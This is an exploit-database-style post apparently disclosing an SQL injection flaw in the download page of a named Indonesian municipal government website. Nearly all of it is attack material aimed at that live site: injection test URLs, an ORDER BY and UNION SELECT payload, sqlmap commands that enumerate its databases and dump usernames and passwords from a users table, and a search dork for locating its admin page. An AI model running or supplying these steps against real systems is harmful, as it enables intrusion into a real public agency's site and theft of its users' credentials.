#Exploit Title: Location Kota Palopo – SQL Injection vulnerability
#Date: 2020-08-19
#Exploit Author: Hussien AL-Malki
#Vendor Homepage: fortinusa.co.id
#Google Dork: N/A
#Category: webapps
#Tested On: blackerch linux , Firefox
#Software Link: dpmptsp.palopokota.go.id/index.html
Proof of Concept:
Search google Dork: site:www.dpmptsp.palopokota.go.id/ id=
Demo: http://dpmptsp.palopokota.go.id/libs/download_izin.php?id=37'
Demo: http://dpmptsp.palopokota.go.id/libs/download_izin.php?id=-37 order 55-- -
Demo: dpmptsp.palopokota.go.id/libs/download_izin.php?id=-37 +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55-- -
#################################################################
Use sqlmap
sqlmap -u "http://dpmptsp.palopokota.go.id/libs/download_izin.php?id=37" --dbs
sqlmap -u "http://dpmptsp.palopokota.go.id/libs/download_izin.php?id=37" -D antrian --tables
sqlmap -u "http://dpmptsp.palopokota.go.id/libs/download_izin.php?id=37" -D antrian -T users --columns
sqlmap -u "http://dpmptsp.palopokota.go.id/libs/download_izin.php?id=37" -D antrian -T users -C USERNAME,PASSWORD --dump
Google Dork admin : site:www.dpmptsp.palopokota.go.id/ admin
*********************************************************
#Discovered by: Hussien AL-Malki
*********************************************************